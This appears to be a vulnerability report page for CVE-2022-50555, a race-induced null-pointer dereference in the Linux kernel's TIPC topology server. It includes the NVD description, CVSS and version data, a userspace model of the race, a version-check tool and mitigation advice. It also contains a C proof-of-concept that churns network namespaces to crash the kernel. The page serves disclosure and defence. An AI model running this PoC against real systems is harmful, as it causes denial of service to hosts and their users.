Security Vulnerability Report
CVE-2022-50555 CVSS 5.5 MEDIUM

CVE-2022-50555

Published: 2025-10-07 16:15:44
Last Modified: 2026-02-05 15:01:48
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

tipc: fix a null-ptr-deref in tipc_topsrv_accept

syzbot found a crash in tipc_topsrv_accept:

  KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
  Workqueue: tipc_rcv tipc_topsrv_accept
  RIP: 0010:kernel_accept+0x22d/0x350 net/socket.c:3487
  Call Trace:
  <TASK>
  tipc_topsrv_accept+0x197/0x280 net/tipc/topsrv.c:460
  process_one_work+0x991/0x1610 kernel/workqueue.c:2289
  worker_thread+0x665/0x1080 kernel/workqueue.c:2436
  kthread+0x2e4/0x3a0 kernel/kthread.c:376
  ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306

It was caused by srv->listener that might be set to null by tipc_topsrv_stop() in net .exit whereas it's still used in tipc_topsrv_accept() worker.

srv->listener is protected by srv->idr_lock in tipc_topsrv_stop(), so add a check for srv->listener under srv->idr_lock in tipc_topsrv_accept() to avoid the null-ptr-deref. To ensure the lsock is not released during the tipc_topsrv_accept(), move sock_release() after tipc_topsrv_work_stop() where it's waiting until the tipc_topsrv_accept worker to be done.

Note that sk_callback_lock is used to protect sk->sk_user_data instead of srv->listener, and it should check srv in tipc_topsrv_listener_data_ready() instead. This also ensures that no more tipc_topsrv_accept worker will be started after tipc_conn_close() is called in tipc_topsrv_stop() where it sets sk->sk_user_data to null.
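The commit message describes two ordering changes: the accept worker must check srv->listener under srv->idr_lock, and tipc_topsrv_stop() must drain the workqueue before sock_release(). The block below is an added userspace model written for this page; it is not kernel code and not the patch. The function names mirror net/tipc/topsrv.c, but the idr_lock spinlock and the tipc_rcv workqueue are replaced by explicit state (an assumed simplification), so every interleaving of the accept worker against net .exit can be replayed deterministically, before and after the fix.

```c
/* Added userspace model of the tipc_topsrv_stop() / tipc_topsrv_accept()
 * race and of the two-part fix (listener check under idr_lock, and
 * sock_release() only after the workqueue is drained). Not kernel code:
 * names mirror net/tipc/topsrv.c, but the spinlock and the tipc_rcv
 * workqueue are replaced by explicit state so that each interleaving
 * can be replayed deterministically. */
#include <stdio.h>
#include <stdlib.h>

enum accept_result {
    ACCEPT_NOT_RUN,
    ACCEPT_OK,                /* kernel_accept() ran on a live listener */
    ACCEPT_SKIPPED,           /* patched worker saw srv->listener == NULL and returned */
    ACCEPT_NULL_DEREF,        /* unpatched worker passed NULL to kernel_accept() */
    ACCEPT_USE_AFTER_RELEASE  /* worker used lsock after sock_release() */
};

/* How far the accept worker had got when net .exit ran. */
enum worker_progress { WORKER_QUEUED, WORKER_LOADED, WORKER_DONE };

enum work_state { WORK_IDLE, WORK_QUEUED, WORK_RUNNING };

struct lsock { int released; };

struct topsrv {
    struct lsock *listener;     /* srv->listener, protected by srv->idr_lock */
    int idr_lock_held;          /* stand-in for spin_lock_bh(&srv->idr_lock) */
    enum work_state work;       /* the accept work item on the tipc_rcv workqueue */
    struct lsock *work_lsock;   /* listener pointer already loaded by a running worker */
    enum accept_result result;
};

static void idr_lock(struct topsrv *s)   { s->idr_lock_held = 1; }
static void idr_unlock(struct topsrv *s) { s->idr_lock_held = 0; }

/* First half of tipc_topsrv_accept(): load srv->listener into a local. */
static void accept_load_listener(struct topsrv *srv, int patched)
{
    if (patched) {
        idr_lock(srv);
        if (!srv->listener) {            /* the check the patch adds */
            idr_unlock(srv);
            srv->result = ACCEPT_SKIPPED;
            srv->work = WORK_IDLE;
            return;
        }
        srv->work_lsock = srv->listener;
        idr_unlock(srv);
    } else {
        srv->work_lsock = srv->listener; /* unlocked, unchecked read */
        if (!srv->work_lsock) {
            srv->result = ACCEPT_NULL_DEREF;
            srv->work = WORK_IDLE;
            return;
        }
    }
    srv->work = WORK_RUNNING;
}

/* Second half: kernel_accept(lsock, ...) on the pointer loaded above. */
static void accept_use_listener(struct topsrv *srv)
{
    srv->result = srv->work_lsock->released ? ACCEPT_USE_AFTER_RELEASE : ACCEPT_OK;
    srv->work = WORK_IDLE;
}

/* tipc_topsrv_work_stop(): destroy_workqueue() drains the queue, so a
 * queued item still runs and a running one is waited for. */
static void topsrv_work_stop(struct topsrv *srv, int patched)
{
    if (srv->work == WORK_QUEUED)
        accept_load_listener(srv, patched);
    if (srv->work == WORK_RUNNING)
        accept_use_listener(srv);
}

static void sock_release(struct lsock *l) { l->released = 1; }

/* Before the patch: release the socket and clear the pointer under
 * idr_lock, then drain the workqueue. */
static void topsrv_stop_unpatched(struct topsrv *srv)
{
    struct lsock *lsock = srv->listener;
    idr_lock(srv);
    sock_release(lsock);
    srv->listener = NULL;
    idr_unlock(srv);
    topsrv_work_stop(srv, 0);
    free(lsock);
}

/* After the patch: clear the pointer under idr_lock, drain the
 * workqueue, and only then release the socket. */
static void topsrv_stop_patched(struct topsrv *srv)
{
    struct lsock *lsock;
    idr_lock(srv);
    lsock = srv->listener;
    srv->listener = NULL;
    idr_unlock(srv);
    topsrv_work_stop(srv, 1);
    sock_release(lsock);
    free(lsock);
}

/* Replay one interleaving and report what the accept worker ended up doing. */
enum accept_result replay(int patched, enum worker_progress progress)
{
    struct topsrv srv = { 0 };
    srv.listener = calloc(1, sizeof(*srv.listener));
    srv.work = WORK_QUEUED;   /* a client connected; data_ready queued the work */
    if (progress != WORKER_QUEUED)
        accept_load_listener(&srv, patched);
    if (progress == WORKER_DONE)
        accept_use_listener(&srv);
    if (patched)
        topsrv_stop_patched(&srv);
    else
        topsrv_stop_unpatched(&srv);
    return srv.result;
}

int main(void)
{
    static const char *names[] = { "NOT_RUN", "OK", "SKIPPED", "NULL_DEREF", "USE_AFTER_RELEASE" };
    static const char *progress[] = { "queued", "loaded listener", "done" };
    for (int patched = 0; patched <= 1; patched++)
        for (int p = WORKER_QUEUED; p <= WORKER_DONE; p++)
            printf("%-9s worker %-16s -> %s\n", patched ? "patched" : "unpatched",
                   progress[p], names[replay(patched, (enum worker_progress)p)]);
    return 0;
}
```

The unpatched replay reproduces the syzbot crash (worker queued, namespace exits, worker reads a NULL listener) and also the second hazard the message points at: a worker that already loaded lsock uses it after sock_release(). With the patched ordering, a queued worker bails under the lock and a running worker finishes before the socket goes away, which is why both halves of the change are needed.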

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (version ranges below, from the NVD configuration data in the raw JSON)

Linux Kernel 4.17 up to (excluding) 4.19.264
Linux Kernel 4.20 up to (excluding) 5.4.223
Linux Kernel 5.5 up to (excluding) 5.10.153
Linux Kernel 5.11 up to (excluding) 5.15.77
Linux Kernel 5.16 up to (excluding) 6.0.7
Linux Kernel 6.1-rc1 ~ 6.1-rc2
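The ranges above are mainline and stable version numbers, so the quickest first check is to compare the running kernel's release string against them. The block below is an added check written for this page, not a tool from the kernel project or NVD; its table is copied from the versionStartIncluding / versionEndExcluding pairs plus the two listed release candidates, and it assumes uname -r style input (major.minor.patch with an optional -rcN suffix).

```c
/* Added check: does a kernel release string fall inside the ranges NVD
 * lists as affected by CVE-2022-50555? The table is copied from the
 * configuration data (versionStartIncluding / versionEndExcluding, plus
 * 6.1-rc1 and 6.1-rc2). It compares mainline/stable version numbers only;
 * distribution kernels that backport the fix keep an older base version
 * and must be checked against the vendor's own advisory. */
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

struct kver { int major, minor, patch, rc; };

/* Parse a uname -r style string: "5.15.76", "6.1.0-rc2", "5.10.152-1-amd64".
 * Returns 1 on success, 0 if no major.minor could be read. */
int parse_kver(const char *s, struct kver *v)
{
    const char *rc;

    v->major = v->minor = v->patch = v->rc = 0;
    if (sscanf(s, "%d.%d.%d", &v->major, &v->minor, &v->patch) < 2)
        return 0;
    rc = strstr(s, "-rc");
    if (rc && sscanf(rc + 3, "%d", &v->rc) != 1)
        v->rc = 0;
    return 1;
}

/* Order versions as one integer: three decimal digits each for minor and patch. */
static long vkey(int major, int minor, int patch)
{
    return (long)major * 1000000L + (long)minor * 1000L + patch;
}

static const struct {
    int start_major, start_minor;           /* versionStartIncluding */
    int end_major, end_minor, end_patch;    /* versionEndExcluding */
} ranges[] = {
    { 4, 17,  4, 19, 264 },
    { 4, 20,  5,  4, 223 },
    { 5,  5,  5, 10, 153 },
    { 5, 11,  5, 15,  77 },
    { 5, 16,  6,  0,   7 },
};

/* 1 = inside an affected range, 0 = outside all of them, -1 = unparseable.
 * Only 6.1-rc1 and 6.1-rc2 are listed explicitly; any other -rcN is
 * compared as its base version (e.g. 6.0-rc5 counts as 6.0.0). */
int kernel_is_affected(const char *release)
{
    struct kver v;
    long k;
    size_t i;

    if (!parse_kver(release, &v))
        return -1;
    if (v.major == 6 && v.minor == 1 && v.patch == 0 && (v.rc == 1 || v.rc == 2))
        return 1;
    k = vkey(v.major, v.minor, v.patch);
    for (i = 0; i < sizeof ranges / sizeof ranges[0]; i++) {
        if (k >= vkey(ranges[i].start_major, ranges[i].start_minor, 0) &&
            k <  vkey(ranges[i].end_major, ranges[i].end_minor, ranges[i].end_patch))
            return 1;
    }
    return 0;
}

int main(void)
{
    struct utsname u;

    if (uname(&u) != 0) {
        perror("uname");
        return 1;
    }
    switch (kernel_is_affected(u.release)) {
    case 1:
        printf("%s: inside an affected range (also confirm TIPC is built or loadable: CONFIG_TIPC, lsmod)\n", u.release);
        break;
    case 0:
        printf("%s: outside the affected ranges\n", u.release);
        break;
    default:
        printf("%s: could not parse kernel release\n", u.release);
        break;
    }
    return 0;
}
```

A version match is necessary but not sufficient: the bug is only reachable when TIPC is compiled in or loadable, and since socket(AF_TIPC, ...) autoloads the tipc module on most distributions, a host that never uses TIPC is best protected by blacklisting the module (an `install tipc /bin/false` line under /etc/modprobe.d/). The other precondition is creating and destroying a network namespace, which needs CAP_SYS_ADMIN or, where unprivileged user namespaces are enabled, only an unprivileged local user, which is what the PR:L in the CVSS vector reflects.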

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2022-50555 PoC - Trigger null pointer dereference in tipc_topsrv_accept
// This PoC demonstrates how to trigger the race condition between
// tipc_topsrv_stop() and tipc_topsrv_accept().
//
// Requirements: CONFIG_TIPC (built-in or loadable module) and the ability to
// create network namespaces (CAP_SYS_ADMIN, or unprivileged user namespaces).
// Each unshare(CLONE_NEWNET) creates a topology server in the new namespace;
// connecting to it makes its listener queue tipc_topsrv_accept() on the
// tipc_rcv workqueue, and exiting the namespace runs tipc_topsrv_stop()
// (net .exit) while that worker may still be in flight.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/tipc.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sched.h>
#include <errno.h>

#define ATTEMPTS 100

// Create a TIPC socket (autoloads the tipc module if it is not blacklisted)
int create_tipc_socket(void)
{
    int fd = socket(AF_TIPC, SOCK_SEQPACKET, 0);
    if (fd < 0)
        perror("socket creation failed");
    return fd;
}

// Connect to the topology server (service type TIPC_TOP_SRV, instance
// TIPC_TOP_SRV). This is what makes tipc_topsrv_listener_data_ready() queue
// the accept worker. Note that bind() to a service type below
// TIPC_RESERVED_TYPES (such as type 0) is rejected with EACCES and never
// touches the topology server's listener.
int connect_topsrv(int fd)
{
    struct sockaddr_tipc addr;

    memset(&addr, 0, sizeof(addr));
    addr.family = AF_TIPC;
    addr.addrtype = TIPC_ADDR_NAME;
    addr.addr.name.name.type = TIPC_TOP_SRV;
    addr.addr.name.name.instance = TIPC_TOP_SRV;
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect to topology server failed");
        return -1;
    }
    return 0;
}

// Child: enter a fresh network namespace, poke its topology server, and exit
// immediately so the namespace teardown (net .exit -> tipc_topsrv_stop())
// races the accept worker. Returns the child pid to the parent.
pid_t trigger_namespace_exit(void)
{
    pid_t pid = fork();

    if (pid != 0)
        return pid;

    if (unshare(CLONE_NEWNET) < 0) {
        // Without CAP_SYS_ADMIN, retry inside a new user namespace.
        if (errno != EPERM || unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("unshare failed");
            _exit(1);
        }
    }

    int fd = create_tipc_socket();
    if (fd >= 0) {
        connect_topsrv(fd);
        close(fd);
    }
    // Exit quickly so the namespace is torn down while the accept worker
    // may still be processing
    _exit(0);
}

int main(void)
{
    printf("CVE-2022-50555 PoC - TIPC null pointer dereference\n");
    printf("Attempting to trigger race condition in tipc_topsrv_accept...\n");

    // Repeatedly create and destroy namespaces to widen the race window
    for (int i = 0; i < ATTEMPTS; i++) {
        pid_t pid = trigger_namespace_exit();
        if (pid > 0) {
            int status;
            waitpid(pid, &status, 0);
        } else if (pid < 0) {
            perror("fork failed");
            break;
        }
        usleep(1000); // Small delay between attempts
    }
    printf("PoC execution completed. Check dmesg for kernel panic.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/24b129aed8730e48f47d852d58d76825ab6f407c (Patch)
https://git.kernel.org/stable/c/32a3d4660b34ce49ac0162338ebe362098e2f5df (Patch)
https://git.kernel.org/stable/c/7a939503fc32bff4ed60800b73ff7fbb4aea2142 (Patch)
https://git.kernel.org/stable/c/82cb4e4612c633a9ce320e1773114875604a3cce (Patch)
https://git.kernel.org/stable/c/ce69bdac2310152bb70845024d5d704c52aabfc3 (Patch)
https://git.kernel.org/stable/c/cedb41664e27b2cae7e21487f1bee22dcd84037d (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50555", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:43.850", "lastModified": "2026-02-05T15:01:48.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix a null-ptr-deref in tipc_topsrv_accept\n\nsyzbot found a crash in tipc_topsrv_accept:\n\n KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]\n Workqueue: tipc_rcv tipc_topsrv_accept\n RIP: 0010:kernel_accept+0x22d/0x350 net/socket.c:3487\n Call Trace:\n <TASK>\n tipc_topsrv_accept+0x197/0x280 net/tipc/topsrv.c:460\n process_one_work+0x991/0x1610 kernel/workqueue.c:2289\n worker_thread+0x665/0x1080 kernel/workqueue.c:2436\n kthread+0x2e4/0x3a0 kernel/kthread.c:376\n ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:306\n\nIt was caused by srv->listener that might be set to null by\ntipc_topsrv_stop() in net .exit whereas it's still used in\ntipc_topsrv_accept() worker.\n\nsrv->listener is protected by srv->idr_lock in tipc_topsrv_stop(), so add\na check for srv->listener under srv->idr_lock in tipc_topsrv_accept() to\navoid the null-ptr-deref. To ensure the lsock is not released during the\ntipc_topsrv_accept(), move sock_release() after tipc_topsrv_work_stop()\nwhere it's waiting until the tipc_topsrv_accept worker to be done.\n\nNote that sk_callback_lock is used to protect sk->sk_user_data instead of\nsrv->listener, and it should check srv in tipc_topsrv_listener_data_ready()\ninstead. 
This also ensures that no more tipc_topsrv_accept worker will be\nstarted after tipc_conn_close() is called in tipc_topsrv_stop() where it\nsets sk->sk_user_data to null."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "4.19.264", "matchCriteriaId": "09C4D37C-A518-40EC-BBAC-23AE3A97FF35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.223", "matchCriteriaId": "7FE3F72A-5992-4ABB-A961-F834281060A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.153", "matchCriteriaId": "62052E35-0E91-4164-BB92-83270CEA0113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.77", "matchCriteriaId": "756161DE-EFE3-4008-964A-DFE360B188B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.7", "matchCriteriaId": "65D387F0-209C-4EAD-98BA-C4B430A840C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", 
"matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/24b129aed8730e48f47d852d58d76825ab6f407c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/32a3d4660b34ce49ac0162338ebe362098e2f5df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a939503fc32bff4ed60800b73ff7fbb4aea2142", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/82cb4e4612c633a9ce320e1773114875604a3cce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce69bdac2310152bb70845024d5d704c52aabfc3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cedb41664e27b2cae7e21487f1bee22dcd84037d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}